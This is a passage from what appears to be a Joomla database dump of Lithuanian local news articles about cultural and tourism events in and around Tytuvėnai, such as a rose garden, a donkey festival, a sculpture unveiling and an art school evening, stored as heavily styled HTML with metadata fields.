\'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=270}stories/naujienos/roziu_sodas2{/gallery}</span></span></span></span></span></span></span></span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Šis sodas bus labai gražus ir išskirtinis. Norint realybėje pamatyti galutinį rožių sodo rezultatą teks padirbėti iš peties porą metų, tačiau laukti bus tikrai verta</span>.</span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> </span></span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> </span></p>\r\n<p> </p>\r\n<p> </p>',1,0,0,44,'2016-07-26 04:47:37',135,'','2016-07-26 04:51:42',135,0,'0000-00-00 00:00:00','2016-07-26 04:47:37','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/roziu_sodas2\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,0,107,'','',1,3203,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(273,362,'Rask laiko sau','rask-laiko-sau','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Moters archetipai ir vaidmenys, savasties paieškos. Kaip neprarasti ryšio su savo instinktyviąja dvasia, padėti vystytis moteriai būdingiems vaizdiniams bei jėgoms.<br /></span></p>\r\n','\r\n<p><img src=\"images/stories/naujienos/rask_laiko/rask_laiko_sau.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p> </p>',1,0,0,44,'2016-09-01 12:31:38',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2016-09-01 12:31:38','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/rask_laiko\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,106,'','',1,2922,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(274,363,'Pasaulinė Turizmo Diena','pasauline-turizmo-diena','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><strong>Pasaulinė Turizmo Diena</strong> Rugsėjo 27, 2016</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">SKATINAME VISUOTINĮ PRIEINAMUMĄ<br /></span></p>\r\n','\r\n<p> <img src=\"images/stories/naujienos/turizmas_visiems/1a.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/turizmas_visiems/1b.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p> </p>',1,0,0,44,'2016-09-13 06:37:30',135,'','2016-09-13 06:39:59',135,0,'0000-00-00 00:00:00','2016-09-13 06:37:30','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/turizmas_visiems\\/turizmas_visiems.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,105,'','',1,2672,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(282,371,'Šventė \"Asiliuko pavasaris\"','svente-asiliuko-pavasaris','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2017 m. balandžio 29 d. 12 val. kaimo turizmo sodyboje \"Gaja\" vyks šventė \"Asiliuko pavasaris\".</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/asiliuko_pavasaris/plakatas_galutinis.jpg\" border=\"0\" alt=\"\" style=\"font-size: 12.16px;\" /></p>',1,0,0,44,'2017-04-27 19:23:28',135,'','2017-04-27 19:25:24',135,135,'2017-04-27 19:25:24','2017-04-27 19:23:28','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/asiliuko_pavasaris\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,97,'','',1,2650,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(281,370,'Sveikiname su Šv. Velykomis!','sveikiname-su-sv-velykomis','','<p style=\"text-align: justify;\"> </p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/velykos2017/easter-eggs_93906.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2017-04-14 18:34:42',135,'','2017-04-14 18:35:21',135,135,'2017-04-14 18:35:21','2017-04-14 18:34:42','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/velykos2017\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,98,'','',1,2404,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(275,364,'Skulptūros atidengimo šventė','skulpturos-atidengimo-svente','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Maloniai kviečiame Jus atvykti 2016 m. spalio 2 d. į skulptūros, skirtos dailininkės Sofijos Dembovskytės-Romerienės atminimui įamžinti, atidengimo šventę.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/kvietimas_rom/kvietimas_sofija_romeriene.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2016-09-21 09:54:57',135,'','2016-09-21 09:56:16',135,0,'0000-00-00 00:00:00','2016-09-21 09:54:57','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/kvietimas_rom\\/kvietimas.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,104,'','',1,3097,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(319,408,'Baltas vakaras Tytuvėnuose','baltas-vakaras-tytuvenuose','','<p>Kviečiame registruotis į rugpjūčio 15 d. vyksiantį \"Baltąjį vakarą\"!</p>\r\n<p> </p>\r\n<p> </p>','',-2,0,0,44,'2018-06-13 08:24:00',135,'','2018-06-13 08:52:14',135,0,'0000-00-00 00:00:00','2018-06-13 08:24:00','0000-00-00 00:00:00','{\"image_intro\":\"images\\/balto skelbimas III.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',20,0,4,'','',1,4,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(276,365,'Šiaulių dailės mokyklos MENŲ VAKARAS','siauliu-dailes-mokyklos-menu-vakaras','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnų bernardinų vienuolyne tikrai vėlų vakarą vyko Šiaulių dailės mokyklos renginys MENŲ VAKARAS - misterija \"Kitoks pasaulis\"<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=300}stories/naujienos/menu_vakaras{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Štai kaip vakaro renginius aprašo dailės mokyklos korespondentai : \" Lapkričio 25 d. vyko jau tradicija tapęs renginys-\"Menų vakaras\". Kasmet vis kitoks-nepakartojamas, pilnas netikėtumų, paslapčių ir atradimų. Šį kartą ieškojome \"kitokio pasaulio\". </span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Vakaro metu vykome į Kelmės kultūros centrą. ... Po to važiavome į Palendrių vienuolyną. ... Vėliau - Tytuvėnų bernardinų vienuolyne - buvusiame vienuolių refektoriuje, po žvaigždiniais skliautais, prie bendro stalo, gėrėme žolelių arbatą ir valgėme dangiško skonio bandeles. Buvo šilta ir jauku. </span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Lydimi gidės, klaidžiojome XVII amžių menančio Tytuvėnų bernardinų vienuolyno koridoriais, žvalgėmės po celes, ieškojome paslapčių ir mistikos, bažnyčioje klausėmės vargonų muzikos. </span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 